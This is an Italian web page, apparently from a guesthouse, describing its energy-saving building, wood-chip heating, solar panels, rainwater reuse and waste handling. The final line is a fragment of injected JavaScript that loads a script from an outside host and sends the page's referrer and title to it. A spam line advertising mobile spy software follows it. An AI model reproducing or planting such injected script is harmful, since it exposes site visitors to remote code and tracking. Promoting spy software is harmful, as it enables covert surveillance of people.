Ambiente

Rispetto per l’ambiente

L’edificio  è stato ricostruito seguendo un rigoroso piano di risparmio energetico per sprecare meno energia possibile. Ciò è stato possibile  utilizzando la coibentazione nei muri, l’ uso dei doppi vetri, del tetto ventilato e di altri accorgimenti.

Il riscaldamento è ottenuto con utilizzo di una caldaia alimentata a cippato ( legno ridotto in scaglie), che proviene dalla pulizia del nostro bosco.

Cippato(scaglie di legno ) è il combustibile per la caldaia

Cippato(scaglie di legno ) è il combustibile per la caldaia

L’acqua calda ottenuta sia con l’utilizzo della caldaia a cippato sia dall’ utilizzo di pannelli solare.

Pannelli solari per la produzione di acqua calda

Pannelli solari per la produzione di acqua calda

L’ Energia elettrica parte viene prodotta attraverso l’utilizzo di pannelli fotovoltaici montati e parte arriva attraverso la rete. In tutte le camere è presente un sistema per il risparmio energetico.

Pannelli fotovoltaici

Pannelli fotovoltaici

L’acqua utilizzata nell’irrigazione dell’orto e dell giardino adiacente alla struttura proviene da un grande serbatoio che raccoglie le acque piovane.

La depurazione delle acque di scarico è effettuata da un sistema biologico che attraverso batteri, che  la purificano , la possiamo rimettere nel ciclo naturale, purificata come è stata prelevata.

Viene svolta la raccolta differenziata del vetro, della plastica, della carta e dei rifiuti organici. Per tutti gli altri rifiuti derivanti da manutenzione attrezzature, dall’ uso della cucina ed altri che non rientrano nella raccolta differenziata vengono smaltiti attraverso aziende specializzate.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; The most popular 2017 spy software applications for the mobile phones.